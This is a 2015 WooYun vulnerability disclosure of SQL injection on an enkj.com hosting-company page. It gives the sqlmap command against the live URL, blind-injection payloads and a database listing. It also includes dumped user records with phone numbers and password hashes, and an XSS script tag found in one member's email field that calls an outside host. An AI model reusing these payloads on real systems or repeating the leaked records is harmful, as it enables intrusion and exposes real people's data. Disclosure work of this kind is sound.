当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152794

漏洞标题:亿恩科技某站注入(3W会员信息/涉及域名/主机/空间)

相关厂商:enkj.com

漏洞作者: 路人甲

提交时间:2015-11-09 11:32

修复时间:2015-11-22 08:26

公开时间:2015-11-22 08:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

注入点:

sqlmap.py -u "http://www.enkj.com/jz/casedetails.asp?id=1"


存在注入

sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 6375=6375
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: id=1 AND 3257=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [14]:
[*] AdvertManager
[*] db_cms
[*] distribution
[*] ENKJ_WebSite
[*] EnkjCloud
[*] EnkjOpenstack
[*] Framework
[*] FrameworkWeiXin
[*] FreeHost
[*] MainENKJ
[*] master
[*] model
[*] msdb
[*] tempdb


Database: EnkjCloud
Table: Cloud_Sys_User
[3 entries]
+----+--------+-----+-------------+-------+-------------+--------------------+----------+----------+----------------------------------+
| ID | RoleID | Sex | Phone | State | Mobile | AddDate | UserName | RealName | Password |
+----+--------+-----+-------------+-------+-------------+--------------------+----------+----------+----------------------------------+
| 1 | 1 | 0 | 13333333333 | 1 | 60972007 | 09 13 2013 5:00PM | admin | admin | 794fb66f659205fc166808fd38c708f3 |
| 2 | 2 | 0 | 18037333335 | 1 | 18037333335 | 10 29 2013 5:10PM | chenwd | 䢖蝥ᱎ㭠콾ٴ | b80bdd5c1eed585dc0b8e48a175fdf60 |
| 3 | 4 | 0 | 55139626 | 1 | 15137878583 | 11 29 2013 2:00PM | 띞 | 띞 | d639e8a8aa8ba2971bcc29b77551c47d |
+----+--------+-----+-------------+-------+-------------+--------------------+----------+----------+----------------------------------+


back-end DBMS: Microsoft SQL Server 2005
Database: EnkjCloud
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.Cloud_Log_BrowseLog | 805741 |
| dbo.Cloud_Log_UserLog | 87133 |
| dbo.Cloud_User_Member | 31650 |
| dbo.Cloud_Log_OperateLog | 19997 |
| dbo.Cloud_Product_Order | 4708 |
| dbo.Cloud_Product_CloudDisk | 2491 |
| dbo.Cloud_Product_Domain360 | 1626 |
| dbo.Cloud_Sys_IPAddressInfo | 1493 |
| dbo.Cloud_Warning_VmDataNormalHostIp | 1471 |
| dbo.Cloud_Product_ExtendOrder | 1407 |
| dbo.Cloud_Product_UserHost | 1109 |
| dbo.Cloud_Warning_NormalHostIp | 1030 |
| dbo.Cloud_Sys_RoleMenu | 147 |
| dbo.Cloud_Sys_Menu | 68 |
| dbo.Cloud_Sys_Template | 55 |
| dbo.Cloud_Product_PackagesPrice | 30 |
| dbo.Cloud_Sys_Template22 | 29 |
| dbo.Cloud_Sys_Host | 26 |
| dbo.Cloud_Sys_DataStore | 25 |
| dbo.Cloud_Product_DiskOrder | 22 |
| dbo.Cloud_Product_BandwidthPrice | 18 |
| dbo.Cloud_Product_HardwarePrice | 18 |
| dbo.Cloud_Sys_DataStore1 | 15 |
| dbo.Cloud_Product_Proposal | 13 |
| dbo.Cloud_Sys_DataCenter | 7 |
| dbo.Cloud_Product_BasePackages | 6 |
| dbo.Cloud_User_MemberType | 6 |
| dbo.Cloud_Product_Packages | 5 |
| dbo.Cloud_Sys_Role | 4 |
| dbo.Cloud_Sys_User | 3 |
| dbo.Table_1 | 3 |
| dbo.Cloud_Sys_OrderCode | 1 |
| dbo.sysdiagrams | 1 |
+--------------------------------------+---------+


会员表存在3W多

Table: Cloud_User_Member
[2 entries]
+-------------+----------------------------------+----------+------------------------------------------+
| username | password | realname | Email |
+-------------+----------------------------------+----------+------------------------------------------+
| huanshi | cd31a196cc0f3a3923842cce72efd1c8 | <blank> | <script src=http://xss.tw/2294></script> |
| wulibin1985 | dd4b21e9ef71e1291183a46b913ae6f2 |  ॎ | 0000@qq.com |
+-------------+----------------------------------+----------+------------------------------------------+


发现千人痕迹啊
xss

QQ截图20151108162822.png


漏洞证明:

QQ截图20151108162822.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-22 08:26

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无